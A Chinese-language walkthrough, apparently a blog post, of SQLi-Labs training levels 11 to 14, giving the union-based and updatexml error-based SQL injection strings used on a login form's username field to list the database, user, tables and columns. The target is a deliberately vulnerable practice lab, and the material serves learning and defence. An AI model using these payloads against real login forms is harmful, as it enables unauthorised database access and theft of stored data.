sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入、错误注入

超栈2024-06-10 19:09
复制代码 
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 11

复制代码 
SQLI DUMB SERIES-11

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:

同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。

python 复制代码 
uname=admin' -- &passwd=1

实施注入

获取数前数据库的数据名和用户名

sql 复制代码 
uname=0' union select database(),user() from dual -- &passwd=1

获取当前数据库的表名:

sql 复制代码 
uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

获取user表的列名:

python 复制代码 
uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1

Less 12

复制代码 
SQLI DUMB SERIES-12

通过输入判断出查询字符串的闭合方式为")

同样通过这一个点获取数据库名和用户名。

python 复制代码 
uname=0") union select database(),user() from dual -- &passwd=1

Less 13

复制代码 
SQLI DUMB SERIES-13

判断注入点

SQL语句错误,提示异常。

sql 复制代码 
uname=0'&passwd=1

正常输入结果显示成功,不过没有任何提示内容。

sql 复制代码 
uname=admin') -- &passwd=1

如果是这样的话,那就只能通过错误信息来获取数据了,如下所示

sql 复制代码 
uname=0') and updatexml(1,concat(user()),1) -- &passwd=1

实施注入

sql 复制代码 
uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1

获取当前数据库所有的表名

sql 复制代码 
uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1

获取user表所有的列名

sql 复制代码 
uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1

到此注入成功

Less 14

复制代码 
SQLI DUMB SERIES-14

判断注入点

测试双引号报错。

sql 复制代码 
uname=admin "&passwd=1

然后经测试采用双引号加注释符就可以验证登录成功。

sql 复制代码 
uname=admin "-- &passwd=1

但这样还不能获取数据,则判断这个注入方式为错误注入。

通过updatexml方法即可成功注入

sql 复制代码 
uname=admin " and updatexml(1,user(),3)-- &passwd=1

实施注入

获取数据库名

sql 复制代码 
uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1

获取当前数据库所有的表名

sql 复制代码 
uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1

获取user表所有的列名

sql 复制代码 
uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1

系列文章

相关推荐
0思必得06 小时前
[Web自动化] Selenium处理动态网页
前端·爬虫·python·selenium·自动化
qq_192779876 小时前
高级爬虫技巧:处理JavaScript渲染(Selenium)
jvm·数据库·python
东东5166 小时前
智能社区管理系统的设计与实现ssm+vue
前端·javascript·vue.js·毕业设计·毕设
u0109272716 小时前
使用Plotly创建交互式图表
jvm·数据库·python
爱学习的阿磊6 小时前
Python GUI开发:Tkinter入门教程
jvm·数据库·python
catino6 小时前
图片、文件的预览
前端·javascript
tudficdew7 小时前
实战:用Python分析某电商销售数据
jvm·数据库·python
sjjhd6527 小时前
Python日志记录(Logging)最佳实践
jvm·数据库·python
Configure-Handler7 小时前
buildroot System configuration
java·服务器·数据库
2301_821369618 小时前
用Python生成艺术:分形与算法绘图
jvm·数据库·python
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书042026美赛A题智能手机电池续航时间预测的连续时间数学模型05OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)06Linux下V2Ray安装配置指南07UV安装并设置国内源08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services092025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望10Claude Code Skills 实用使用手册